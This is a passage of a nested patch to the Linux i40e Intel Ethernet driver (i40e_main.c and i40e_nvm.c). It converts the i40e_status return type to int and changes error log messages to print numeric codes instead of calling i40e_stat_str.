+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (ret)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Rebuild the VSIs and VEBs that existed before reset.
+@@ -11053,8 +11052,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 		msleep(75);
+ 		ret = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (ret)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -11085,9 +11084,9 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	ret = i40e_set_promiscuous(pf, pf->cur_promisc);
+ 	if (ret)
+ 		dev_warn(&pf->pdev->dev,
+-			 "Failed to restore promiscuous setting: %s, err %s aq_err %s\n",
++			 "Failed to restore promiscuous setting: %s, err %d aq_err %s\n",
+ 			 pf->cur_promisc ? "on" : "off",
+-			 i40e_stat_str(&pf->hw, ret),
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	i40e_reset_all_vfs(pf, true);
+@@ -12221,8 +12220,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 			(struct i40e_aqc_get_set_rss_key_data *)seed);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12235,8 +12234,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_get_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12511,11 +12510,11 @@ int i40e_reconfig_rss_queues(struct i40e_pf *pf, int queue_count)
+  * i40e_get_partition_bw_setting - Retrieve BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
++int i40e_get_partition_bw_setting(struct i40e_pf *pf)
+ {
+-	i40e_status status;
+ 	bool min_valid, max_valid;
+ 	u32 max_bw, min_bw;
++	int status;
+ 
+ 	status = i40e_read_bw_from_alt_ram(&pf->hw, &max_bw, &min_bw,
+ 					   &min_valid, &max_valid);
+@@ -12534,10 +12533,10 @@ i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_set_partition_bw_setting - Set BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
++int i40e_set_partition_bw_setting(struct i40e_pf *pf)
+ {
+ 	struct i40e_aqc_configure_partition_bw_data bw_data;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+ 
+@@ -12556,12 +12555,12 @@ i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_commit_partition_bw_setting - Commit BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ {
+ 	/* Commit temporary BW setting to permanent NVM image */
+ 	enum i40e_admin_queue_err last_aq_status;
+-	i40e_status ret;
+ 	u16 nvm_word;
++	int ret;
+ 
+ 	if (pf->hw.partition_id != 1) {
+ 		dev_info(&pf->pdev->dev,
+@@ -12576,8 +12575,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for read access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for read access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12593,8 +12592,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "NVM read error, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "NVM read error, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12607,8 +12606,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for write access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for write access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12627,8 +12626,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret)
+ 		dev_info(&pf->pdev->dev,
+-			 "BW settings NOT SAVED, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "BW settings NOT SAVED, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ bw_commit_out:
+ 
+@@ -12649,7 +12648,7 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ #define I40E_LINK_BEHAVIOR_WORD_LENGTH		0x1
+ #define I40E_LINK_BEHAVIOR_OS_FORCED_ENABLED	BIT(0)
+ #define I40E_LINK_BEHAVIOR_PORT_BIT_LENGTH	4
+-	i40e_status read_status = I40E_SUCCESS;
++	int read_status = I40E_SUCCESS;
+ 	u16 sr_emp_sr_settings_ptr = 0;
+ 	u16 features_enable = 0;
+ 	u16 link_behavior = 0;
+@@ -12682,8 +12681,8 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ 
+ err_nvm:
+ 	dev_warn(&pf->pdev->dev,
+-		 "total-port-shutdown feature is off due to read nvm error: %s\n",
+-		 i40e_stat_str(&pf->hw, read_status));
++		 "total-port-shutdown feature is off due to read nvm error: %d\n",
++		 read_status);
+ 	return ret;
+ }
+ 
+@@ -13028,7 +13027,7 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+ 	u8 type, filter_index;
+-	i40e_status ret;
++	int ret;
+ 
+ 	type = ti->type == UDP_TUNNEL_TYPE_VXLAN ? I40E_AQC_TUNNEL_TYPE_VXLAN :
+ 						   I40E_AQC_TUNNEL_TYPE_NGE;
+@@ -13036,8 +13035,8 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	ret = i40e_aq_add_udp_tunnel(hw, ntohs(ti->port), type, &filter_index,
+ 				     NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "add UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "add UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13052,12 +13051,12 @@ static int i40e_udp_tunnel_unset_port(struct net_device *netdev,
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_aq_del_udp_tunnel(hw, ti->hw_priv, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "delete UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "delete UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13946,8 +13945,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't get PF vsi config, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't get PF vsi config, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENOENT;
+@@ -13976,8 +13975,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						     pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13996,8 +13995,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -14019,9 +14018,9 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 				 * message and continue
+ 				 */
+ 				dev_info(&pf->pdev->dev,
+-					 "failed to configure TCs for main VSI tc_map 0x%08x, err %s aq_err %s\n",
++					 "failed to configure TCs for main VSI tc_map 0x%08x, err %d aq_err %s\n",
+ 					 enabled_tc,
+-					 i40e_stat_str(&pf->hw, ret),
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 			}
+@@ -14115,8 +14114,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 		if (ret) {
+ 			dev_info(&vsi->back->pdev->dev,
+-				 "add vsi failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "add vsi failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			ret = -ENOENT;
+@@ -14147,8 +14146,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* VSI is already added so not tearing that up */
+ 		ret = 0;
+@@ -14594,8 +14593,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						  &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14604,8 +14603,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						   &ets_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw ets config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw ets config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14801,8 +14800,8 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 	/* get a VEB from the hardware */
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't add VEB, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't add VEB, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+@@ -14812,16 +14811,16 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 					 &veb->stats_idx, NULL, NULL, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB statistics idx, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB statistics idx, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		i40e_aq_delete_element(&pf->hw, veb->seid, NULL);
+ 		return -ENOENT;
+@@ -15031,8 +15030,8 @@ int i40e_fetch_switch_configuration(struct i40e_pf *pf, bool printconfig)
+ 						&next_seid, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "get switch config failed err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "get switch config failed err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			kfree(aq_buf);
+@@ -15077,8 +15076,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 	ret = i40e_fetch_switch_configuration(pf, false);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't fetch switch config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't fetch switch config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -15104,8 +15103,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 						NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -15442,13 +15441,12 @@ static bool i40e_check_recovery_mode(struct i40e_pf *pf)
+  *
+  * Return 0 on success, negative on failure.
+  **/
+-static i40e_status i40e_pf_loop_reset(struct i40e_pf *pf)
++static int i40e_pf_loop_reset(struct i40e_pf *pf)
+ {
+ 	/* wait max 10 seconds for PF reset to succeed */
+ 	const unsigned long time_end = jiffies + 10 * HZ;
+-
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	while (ret != I40E_SUCCESS && time_before(jiffies, time_end)) {
+@@ -15494,9 +15492,9 @@ static bool i40e_check_fw_empr(struct i40e_pf *pf)
+  * Return 0 if NIC is healthy or negative value when there are issues
+  * with resets
+  **/
+-static i40e_status i40e_handle_resets(struct i40e_pf *pf)
++static int i40e_handle_resets(struct i40e_pf *pf)
+ {
+-	const i40e_status pfr = i40e_pf_loop_reset(pf);
++	const int pfr = i40e_pf_loop_reset(pf);
+ 	const bool is_empr = i40e_check_fw_empr(pf);
+ 
+ 	if (is_empr || pfr != I40E_SUCCESS)
+@@ -15635,13 +15633,15 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ #ifdef CONFIG_I40E_DCB
+ 	enum i40e_get_fw_lldp_status_resp lldp_status;
+-	i40e_status status;
+ #endif /* CONFIG_I40E_DCB */
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	static u16 pfs_found;
+ 	u16 wol_nvm_bits;
+ 	u16 link_status;
++#ifdef CONFIG_I40E_DCB
++	int status;
++#endif /* CONFIG_I40E_DCB */
+ 	int err;
+ 	u32 val;
+ 	u32 i;
+@@ -16010,8 +16010,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (err)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Reconfigure hardware for allowing smaller MSS in the case
+@@ -16029,8 +16029,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		msleep(75);
+ 		err = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (err)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -16162,8 +16162,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the requested speeds from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, false, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	pf->hw.phy.link_info.requested_speeds = abilities.link_speed;
+ 
+@@ -16173,8 +16173,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the supported phy types from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, true, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* make sure the MFS hasn't been set lower than the default */
+@@ -16245,7 +16245,7 @@ static void i40e_remove(struct pci_dev *pdev)
+ {
+ 	struct i40e_pf *pf = pci_get_drvdata(pdev);
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret_code;
++	int ret_code;
+ 	int i;
+ 
+ 	i40e_dbg_pf_exit(pf);
+@@ -16493,9 +16493,9 @@ static void i40e_pci_error_resume(struct pci_dev *pdev)
+ static void i40e_enable_mc_magic_wake(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u8 mac_addr[6];
+ 	u16 flags = 0;
++	int ret;
+ 
+ 	/* Get current MAC address in case it's an LAA */
+ 	if (pf->vsi[pf->lan_vsi] && pf->vsi[pf->lan_vsi]->netdev) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 3a38bf8bcde7e..17e3f26eee4a4 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -13,10 +13,10 @@
+  * in this file) as an equivalent of the FLASH part mapped into the SR.
+  * We are accessing FLASH always thru the Shadow RAM.
+  **/
+-i40e_status i40e_init_nvm(struct i40e_hw *hw)
++int i40e_init_nvm(struct i40e_hw *hw)
+ {
+ 	struct i40e_nvm_info *nvm = &hw->nvm;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 fla, gens;
+ 	u8 sr_size;
+ 
+@@ -52,12 +52,12 @@ i40e_status i40e_init_nvm(struct i40e_hw *hw)
+  * This function will request NVM ownership for reading
+  * via the proper Admin Command.
+  **/
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				       enum i40e_aq_resource_access_type access)
++int i40e_acquire_nvm(struct i40e_hw *hw,
++		     enum i40e_aq_resource_access_type access)
+ {
+-	i40e_status ret_code = 0;
+ 	u64 gtime, timeout;
+ 	u64 time_left = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+ 		goto i40e_i40e_acquire_nvm_exit;
+@@ -111,7 +111,7 @@ i40e_i40e_acquire_nvm_exit:
+  **/
+ void i40e_release_nvm(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_SUCCESS;
++	int ret_code = I40E_SUCCESS;
+ 	u32 total_delay = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+@@ -138,9 +138,9 @@ void i40e_release_nvm(struct i40e_hw *hw)
+  *
+  * Polls the SRCTL Shadow RAM register done bit.
+  **/
+-static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
++static int i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 srctl, wait_cnt;
+ 
+ 	/* Poll the I40E_GLNVM_SRCTL until the done bit is set */
+@@ -165,10 +165,10 @@ static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+  *
+  * Reads one 16 bit word from the Shadow RAM using the GLNVM_SRCTL register.
+  **/
+-static i40e_status i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
+-					    u16 *data)
++static int i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
++				    u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 sr_reg;
+ 
+ 	if (offset >= hw->nvm.sr_size) {
+@@ -216,13 +216,13 @@ read_nvm_exit:
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+-				    u8 module_pointer, u32 offset,
+-				    u16 words, void *data,
+-				    bool last_command)
++static int i40e_read_nvm_aq(struct i40e_hw *hw,
++			    u8 module_pointer, u32 offset,
++			    u16 words, void *data,
++			    bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -264,10 +264,10 @@ static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM using the AdminQ
+  **/
+-static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+-					 u16 *data)
++static int i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
++				 u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 
+ 	ret_code = i40e_read_nvm_aq(hw, 0x0, offset, 1, data, true);
+ 	*data = le16_to_cpu(*(__le16 *)data);
+@@ -286,8 +286,8 @@ static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+  * Do not use this function except in cases where the nvm lock is already
+  * taken via i40e_acquire_nvm().
+  **/
+-static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+-					u16 offset, u16 *data)
++static int __i40e_read_nvm_word(struct i40e_hw *hw,
++				u16 offset, u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_word_aq(hw, offset, data);
+@@ -303,10 +303,10 @@ static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM.
+  **/
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-			       u16 *data)
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
++		       u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_NVM_READ_REQUIRES_LOCK)
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -330,17 +330,17 @@ i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+  * @words_data_size: Words to read from NVM
+  * @data_ptr: Pointer to memory location where resulting buffer will be stored
+  **/
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr)
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr)
+ {
+-	i40e_status status;
+ 	u16 specific_ptr = 0;
+ 	u16 ptr_value = 0;
+ 	u32 offset = 0;
++	int status;
+ 
+ 	if (module_ptr != 0) {
+ 		status = i40e_read_nvm_word(hw, module_ptr, &ptr_value);
+@@ -406,10 +406,10 @@ enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+-					      u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
++				      u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u16 index, word;
+ 
+ 	/* Loop thru the selected region */
+@@ -437,13 +437,13 @@ static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
+-					   u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
++				   u16 *words, u16 *data)
+ {
+-	i40e_status ret_code;
+-	u16 read_size;
+ 	bool last_cmd = false;
+ 	u16 words_read = 0;
++	u16 read_size;
++	int ret_code;
+ 	u16 i = 0;
+ 
+ 	do {
+@@ -493,9 +493,9 @@ read_nvm_buffer_aq_exit:
+  * Reads 16 bit words (data buffer) from the SR using the i40e_read_nvm_srrd()
+  * method.
+  **/
+-static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+-					  u16 offset, u16 *words,
+-					  u16 *data)
++static int __i40e_read_nvm_buffer(struct i40e_hw *hw,
++				  u16 offset, u16 *words,
++				  u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_buffer_aq(hw, offset, words, data);
+@@ -514,10 +514,10 @@ static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data)
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
++			 u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE) {
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -544,12 +544,12 @@ i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
